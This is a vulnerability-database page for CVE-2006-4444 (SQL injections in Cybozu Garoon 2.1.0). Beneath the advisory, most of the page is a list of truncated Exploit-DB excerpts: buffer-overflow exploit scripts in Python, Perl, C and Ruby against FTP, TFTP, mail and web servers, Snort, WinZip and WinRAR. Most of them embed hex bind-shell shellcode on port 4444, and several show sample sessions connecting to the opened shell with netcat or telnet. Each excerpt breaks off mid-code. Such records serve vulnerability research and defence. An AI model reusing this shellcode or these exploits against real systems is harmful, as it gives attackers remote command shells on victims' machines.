CVE-2006-4444
Published 2006-08-29
Priority P3 · 35 · medium · 6.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
EXPLOIT
EPSS 2.85% (84.9th percentile)
Multiple SQL injection vulnerabilities in Cybozu Garoon 2.1.0 for Windows allow remote authenticated users to execute arbitrary SQL commands via the (1) tid parameter in the (a) todo/view (aka TODO List View), (b) todo/modify (aka TODO List Modify), or (c) todo/delete functionality; the (2) pid parameter in the (d) workflow/view or (e) workflow/print functionality; the (3) uid parameter in the (f) schedule/user_view, (g) phonemessage/add, (h) phonemessage/history, or (i) schedule/view functionality; the (4) cid parameter in (j) todo/index; the (5) iid parameter in the (k) memo/view or (l) memo/print functionality; or the (6) event parameter in the (m) schedule/view functionality.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cybozu | garoon | — | — |
No detection rules found.
Exploit-DB
CVE-2006-2369 [HIGH] RealVNC 4.1.0/4.1.1 - Authentication Bypass
exploitdb · 2012-05-13 · CVSS 7.5
---
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re
BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444
def pwn4ge(host, port):
    socket.setdefaulttimeout(5)
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((host, port))
    except socket.error, msg:
        print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
        sys.exit();
    else:
hello
Exploit-DB
CVE-2006-6576 Golden FTP Server 4.70 - 'PASS' Buffer Overflow
exploitdb · 2011-01-23
---
#GoldenFTP 4.70 PASS Exploit
#Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
#Tested on XP SP3
#Vendor Contacted: 1/17/2011 (no response)
#For this exploit to work correctly, you need to know the subnet that the server
#is running on. You also need to make sure that "show new connections" is checked in the options.
#The total length of the buffer should be 4 bytes less than the offset, with EIP at the end.
#528 is the offset when server running on 192.168.236.0
#533 is the offset when server running on 10.0.1.0
#530 is the offset when server running on 192.168.1.0
#531 is the offset when server running on 172.16.1.0
require 'net/ftp'
#Metasploit bind shell port=4444 | shikata_ga_nai | 369 bytes
shellcode = ("\
Exploit-DB
CVE-2008-1611 TFTP Server 1.4 - ST Buffer Overflow
exploitdb · 2008-03-26
---
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
##############################
Exploit-DB
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb · 2007-10-15
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
CVE-2007-5467 eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb · 2007-10-15
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 8192
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
Exploit-DB
CVE-2006-5276 [CRITICAL] Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
exploitdb · 2007-03-30 · CVSS 10.0
---
#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from scapy import *
# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
shellcode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
shellcode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
shellcode += "\xb0\x66\xcd
Exploit-DB
CVE-2006-3952 Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow
exploitdb · 2007-03-26
---
#!/usr/bin/python
# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability
# was discovered by h07 and a POC for windows XP SP2 (polish version) was
# provided. This exploit was tested on windows 2000 server SP4. The exploit
# binds a shell on TCP port 4444.
#
# Author shall bear no responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import struct
import socket
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42
Exploit-DB
CVE-2006-6026 Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow
exploitdb · 2007-03-21
---
#/usr/bin/python
# Remote exploit for the vulnerability in Helix server v11.0.1 as described
# at http://gleg.net/helix.txt
#
# The exploit spawns a shell on TCP port 4444 and connects to it. At the time of
# overflow we control EAX which is used in a call as follows
# 00420C64: call dword ptr [eax + 4]
# ECX points into our buffer at the time of overflow. So if we can craft a DWORD
# that points to an address that translates to call dword ptr [ecx + xx] and
# have a pointer into our shellcode at that location then our shellcode executes
# Yes, a lot of indirection here :-). This exploit uses hardcoded address which
# worked fine on Windows 2000 server SP4 machines I have in my test lab. You may
# have to tweak it for your
Exploit-DB
CVE-2006-5143 CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow
exploitdb · 2007-03-16
---
#!/usr/bin/python
# This one was listed in the SANS TOP 20 and I needed an exploit for analysis.
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service stack overflow
# vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was
# tested on windows 2000 SP4 in a VMware environment.
# Opens a shell on TCP port 4444.
#
# Though a stack overflow vulnerability caused due to strcpy, this vulnerability
# provides an interesting case. Unlike a traditional stack overflow where the
# user supplies the overflow data which immediately is copied into a stack
# based buffer, here the user supplied data is stored in the heap and the first
# DW
Exploit-DB
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
exploitdb · 2007-02-28
---
#!/usr/bin/perl -w
# ===============================================================================================
# 3Com TFTP Service \n\n";
exit;
}
$target = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my($shellcode)=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48".
"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab".
"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf".
"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd".
"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9
Exploit-DB
CVE-2006-4948 ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
exploitdb · 2007-01-15
---
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl \n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
my $nop0="\x90"x15;
#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN
my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
my $nop="\x90"x57;
my $nop1="\x90"x7;
my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the win
Exploit-DB
CVE-2006-5551 QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)
exploitdb · 2007-01-01
---
#!/bin/perl
#
#https://www.securityfocus.com/bid/20681
#
# tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit
# credit to Greg Linares for discovered the vulnerability
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "helo acaro" . "\r\n";
send $socket, $request, 0;
print "[+] Sent helo request\n";
recv($socket, $reply, 1024, 0);
Exploit-DB
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
exploitdb · 2006-11-30
---
# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the 3Com TFTP Service version 2.0.1
# long transporting mode buffer overflow under xp sp2 english
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb
# Default port is 69 if not specified
require 'socket'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
sc1 +="\x
Exploit-DB
CVE-2006-6884 WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
exploitdb · 2006-11-15
---
/* WinZip
*
* - prdelka
*/
#include
#include
#include
#include
#include
#include
#include
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
"\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
"\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
"\x93\x46\x2f\x90\xfd\x4a\x6a\x51
Exploit-DB
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb · 2006-09-27
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Exploit-DB
CVE-2006-4974 Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
exploitdb · 2006-09-20
---
/*
ws_exp.c
WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>ws_exp 1 192.168.0.1 4444
[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
[*] Coded by h07
[+] Listening on 21
[+] Connection accepted from 192.168.0.3
[+] Client request: USER h07
[+] Client request: PWD
[+] Client request: SYST
[+] Client request: HELP
[+] Client request: PASV
[+] Sending buffer: OK
[*] Press enter to quit
C:\>nc -v -l -p 4444
listening on [any] 4444 ...
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA
Microsoft Windows 2000 [Wersja 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\WS_FTP>
*/
#include
#define
Exploit-DB
CVE-2006-1255 Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)
exploitdb · 2006-09-11
---
#!/usr/bin/perl
# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version
# Perl script based on Sami FTP server remote exploit by Critical Security
# https://www.securityfocus.com/bid/17138
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n";
send $socket, $exploit, 0;
print "[+] sending 1st chunk\n";
$exploit = "a001 LOGIN " . $pad. $eip ."\r\n";
send $socket, $exploit, 0;
print "[+] sending 2nd chunk\n";
print " + connecting port 4444 of $host
Exploit-DB
CVE-2006-3124 Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)
exploitdb · 2006-08-29
---
/*
* name: streamripper exploit.exe 80 0
* [ public-release ]
* streamripper streamripper.exe http://127.0.0.1:80
* Connecting...
*
* on other shell
* [+] client conneted!
* [+] exploit send check shell on port 4444
*
* now connect to 127.0.0.1:4444
*/
/* #define _WIN32 */
#include
#include
#include
#ifdef _WIN32
#include
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#endif
/* portbind shellcode port 4444*/
unsigned char portbindsc[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
"
Exploit-DB
CVE-2006-4444 Cybozu Garoon 2.1.0 - Multiple SQL Injections
exploitdb · 2006-08-28
---
Cybozu Garoon 2 SQL Injection Vulnerabilities
by Tan Chew Keong
Release Date: 2006-08-28
Summary
Some SQL injection vulnerabilities have been found in Cybozu Garoon 2. When exploited by a logon user,
the vulnerabilities allow manipulation of SQL statements, which can lead to disclosure of information
from the database, or cause the backend MySQL database to consume a large amount of CPU resources.
Tested Versions
Cybozu Garoon 2 Version 2.1.0 for Windows
Details
This advisory discloses several SQL injection vulnerabilities in Cybozu Garoon 2.
1) TODO List View/Modify SQL Injection
Cybozu Garoon 2 does not properly sanitise the "tid" parameter in the TODO List View and Modify
functionality. It is possible for a logon user to exploit
Exploit-DB
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb · 2006-08-21
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Exploit-DB
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
exploitdb · 2006-07-27
---
#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
#
Exploit-DB
CVE-2006-3912 WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow
exploitdb · 2006-07-07
---
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
XP SP2 French return address : JA
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x
Exploit-DB
CVE-2006-3912 WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow
exploitdb · 2006-07-05
---
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4d\x34\x
Exploit-DB
CVE-2006-2926 QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow
exploitdb · 2006-06-07
---
### *** Proof of concept (not for "in the wild" kiddies) ***
### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
### by kcope in 2006
###
use IO::Socket;
if ($ARGV[0] eq "")
{
print "param1 = remote host";
exit;
}
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f
Exploit-DB
CVE-2006-0460 [HIGH] BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow
exploitdb · 2006-03-22 · CVSS 7.5
---
#include
#include
#include
#include
#include
#include
#include
/* fork() + bind() port 31337 - ty izik */
char linux_shellcode[]=
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x5b\x5d\x52\x66\xbd\x69\x7a\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd\x80\x85\xc0"
"\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xb2\x6a\x06\x58"
"\xcd\x80\xb3\x04\xeb\xc9";
/* bind shell to 4444 - metasploit */
char win32_shellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x36"
"\xbc\x74\xb1\x83\xeb\xfc\xe2\xf4\xca\xd6\x9f\xfc\xde\x45\x8b\x4e"
"\xc9\xdc\xff\xdd\x12\x98\xff\xf4\x0a\x37\x08
No writeups or analysis indexed.
References
http://cybozu.co.jp/products/dl/notice_060825/
http://secunia.com/advisories/21664
http://vuln.sg/cybozugaroon-en.html
http://www.osvdb.org/28361
http://www.osvdb.org/28362
http://www.osvdb.org/28363
http://www.osvdb.org/28364
http://www.osvdb.org/28365
http://www.osvdb.org/28366
http://www.securityfocus.com/bid/19731
http://www.vupen.com/english/advisories/2006/3399
https://exchange.xforce.ibmcloud.com/vulnerabilities/28594